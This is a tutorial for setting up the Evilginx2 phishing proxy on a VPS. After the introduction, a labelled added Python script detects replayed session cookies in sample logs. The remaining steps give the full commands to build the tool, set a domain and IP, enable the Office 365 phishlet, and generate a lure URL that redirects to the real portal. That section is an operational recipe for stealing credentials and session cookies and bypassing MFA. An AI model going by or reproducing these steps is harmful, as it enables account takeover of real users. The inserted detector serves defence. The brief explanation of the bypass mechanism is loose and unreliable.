Evilginx is a man-in-the-middle exploit platform that is used to phish passwords as well as session cookies, which may eventually be used to circumvent 2-factor authentication security.

Evilginx is considered a sophisticated tool because it can bypass two-factor authentication (2FA) and multi-factor authentication (MFA) mechanisms. This is done by intercepting the user’s session after they have successfully logged in and then redirecting them to a fake page where their session is hijacked.
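
From the defender's side, a captured session cookie that is later replayed shows up as one session being used by two different clients. The following is an added example, not part of the original post or of Evilginx: it flags sessions whose requests come from an IP address or User-Agent other than the one that completed the login. The JSON-lines log schema, field names and records are constructed assumptions.

```python
import json

# Constructed sample records (assumed JSON-lines schema, documentation IP ranges).
SAMPLE_LOG = """
{"ts":"2024-05-01T09:00:02Z","event":"login_ok","user":"alice","sid":"s-1001","ip":"198.51.100.7","ua":"Chrome/124 Windows"}
{"ts":"2024-05-01T09:00:05Z","event":"request","user":"alice","sid":"s-1001","ip":"198.51.100.7","ua":"Chrome/124 Windows"}
{"ts":"2024-05-01T09:00:09Z","event":"login_ok","user":"bob","sid":"s-2002","ip":"192.0.2.10","ua":"Firefox/125 Linux"}
{"ts":"2024-05-01T09:03:40Z","event":"request","user":"bob","sid":"s-2002","ip":"192.0.2.10","ua":"Firefox/125 Linux"}
not-json: truncated record
{"ts":"2024-05-01T09:14:31Z","event":"request","user":"alice","sid":"s-1001","ip":"203.0.113.50","ua":"Firefox/125 Linux"}
{"ts":"2024-05-01T09:14:33Z","event":"request","user":"alice","sid":"s-1001","ip":"203.0.113.50","ua":"Firefox/125 Linux"}
"""

def find_session_replays(log_text):
    """Flag sessions used by a client other than the one that authenticated."""
    origin = {}     # sid -> (ip, ua) recorded when the MFA-backed login completed
    seen = set()    # (sid, ip, ua) already reported, to avoid duplicate alerts
    alerts = []
    for line in log_text.splitlines():
        try:
            rec = json.loads(line)
        except json.JSONDecodeError:
            continue                      # skip blank or malformed lines
        if not isinstance(rec, dict):
            continue                      # valid JSON but not a record
        sid, ip, ua = rec.get("sid"), rec.get("ip"), rec.get("ua")
        if rec.get("event") == "login_ok":
            origin[sid] = (ip, ua)
            continue
        if sid not in origin or (sid, ip, ua) in seen:
            continue                      # login never observed, or already alerted
        changed = [name for name, old, new in
                   (("ip", origin[sid][0], ip), ("ua", origin[sid][1], ua))
                   if old != new]
        if changed:
            seen.add((sid, ip, ua))
            alerts.append({"ts": rec.get("ts"), "user": rec.get("user"),
                           "sid": sid, "changed": changed})
    return alerts

if __name__ == "__main__":
    for alert in find_session_replays(SAMPLE_LOG):
        print(alert)
```

A changed IP on its own also happens with mobile and VPN clients, so an alert where both fields changed deserves more weight than one where only the IP did.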

The framework may employ phishlets to mimic a website, such as Office 365, Citrix, or Netflix, and deceive visitors into entering credentials. Because it is open source, there are several phishlets that are ready to use.

Requirements

  • Domain Name
  • VPS – Debian 10
  • IP Address

sudo apt update
sudo apt install wget git make -y

Install Go

wget https://golang.org/dl/go1.17.linux-amd64.tar.gz
sudo tar -zxvf go1.17.linux-amd64.tar.gz -C /usr/local/
echo 'export PATH=/usr/local/go/bin:${PATH}' | sudo tee /etc/profile.d/go.sh
source /etc/profile.d/go.sh

Install Evilginx

git clone https://github.com/BakkerJan/evilginx2.git
cd evilginx2
make
sudo make install

Configuration Files

Start Evilginx2

sudo evilginx

How to Configure Evilginx

config domain <yourdomain>
config ip <yourIP>
blacklist unauth

Phishlets

phishlets hostname o365 <yourdomain>
phishlets enable o365

Lures

lures create o365
lures edit 0 redirect_url https://portal.office.com
lures get-url 0
